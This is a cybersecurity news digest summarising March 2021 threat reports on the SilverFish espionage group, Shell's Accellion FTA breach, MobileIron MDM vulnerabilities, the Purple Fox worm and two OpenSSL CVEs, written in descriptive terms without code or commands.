Analysis of the new cyber-espionage group SilverFish
The PRODAFT Threat Intelligence team (PTI) has discovered a highly sophisticated cybercriminal group called SilverFish, which operates exclusively against large enterprises and public institutions worldwide, with a focus on the European Union and the United States. SilverFish would use modern management methods, sophisticated tools and even its own sandbox to test malware against systems, using different commercial AV and EDR solutions. The group would be using compromised domains, mostly using WordPress, to redirect traffic to its Command & Control (C2) server. To do this, SilverFish creates new subdomains to make it difficult for the domain owner to realise that the domain is being exploited. According to the investigation, the SilverFish group has been linked to the supply chain attacks against SolarWinds. Furthermore, the group’s infrastructure has revealed links to multiple IoCs previously attributed to TrickBot. Finally, researchers say that SilverFish’s main objectives are likely to be to conduct reconnaissance and leak data from the victim systems of its operations.
All the details: https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
Shell energy company hit by Accellion FTA incident
The Dutch oil company Shell, present in 70 countries and a member of the Fortune 500, issued a statement last week in which it admitted having suffered a security incident that has resulted in the leak of confidential documentation and files. The incident is the result of a third-party compromise that occurred in December 2020, in particular by IT partner Accellion. Several 0-day vulnerabilities in the firm’s file-sharing software, called Accellion FTA, were actively exploited by threat actors to distribute malware and exfiltrate documents hosted on the system. According to Shell, the attackers were unable to gain access to the entity’s digital infrastructure due to the file-sharing software being isolated from its main servers. The leaked files include information related to the group’s subsidiaries and partners, as well as personal information. This data has not yet been publicly disclosed on the website maintained by the operators of the Cl0p ransomware, where other victims of the incident such as Kroger or Singtel had their files compromised.
Vulnerabilities in MobileIron MDM
Security researcher Matt Burch from Optiv has published three vulnerabilities in MobileIron MDM that, if chained together, could lead to user account breaches:
- The first flaw (CVE-2020-35137) could allow attackers to discover an organisation’s MobileIron authentication endpoint since the Mobile@Work mobile app stores the hardcoded API.
- The second vulnerability (CVE-2020-35138) would allow MobileIron authentication requests to be constructed and, under certain circumstances, credentials to be captured via a MITM attack.
- The last flaw (CVE-2021-3391) would allow attackers to perform user enumeration attacks.
While MobileIron has not yet released updates to fix these flaws, it has provided a number of recommendations to mitigate them. Optiv has also published a tool on GitHub to test these security flaws in MobileIron.
Purple Fox acquires worm capabilities and infects Windows servers via SMB
Guardicore researchers have published a report on the Purple Fox malware’s newly acquired worm capability to infect Windows servers through brute-force attacks against vulnerable SMB services exposed to the Internet via port 445. If authentication is successful, Purple Fox creates a service named AC0X (where X is an integer from 0 to 9) that downloads the MSI installation package from one of the HTTP servers in its botnet, which has more than two thousand compromised servers. This new entry vector, observed since the end of 2020, coexists with Purple Fox’s previous infection techniques such as exploiting web browser vulnerabilities or the use of phishing campaigns via email.
Severe vulnerabilities in OpenSSL
The OpenSSL team has issued a warning about two high-severity vulnerabilities, classified as CVE-2021-3449 and CVE-2021-3450. OpenSSL is a software library widely used to create network and server applications that need to establish secure communications. On the one hand, the CVE-2021-3449 vulnerability could lead to a denial of service (DoS) failure, due to the bypass of a NULL pointer that only affects server instances, not clients. This issue, fixed by Peter Kästle and Samuel Sapalski, was reported to the entity on 17 March 2021 by Nokia. On the other hand, vulnerability CVE-2021-3450 deals with a flaw in Certificate Authority (CA) certificate validation, affecting both server and client instances. The flaw was discovered on March 18 by the Akamai team and the patch was developed by Tomáš Mráz. Both vulnerabilities are fixed in OpenSSL version 1.1.1k, with version 1.0.2 being unaffected by this issue.
All the details: https://www.openssl.org/news/secadv/20210325.txt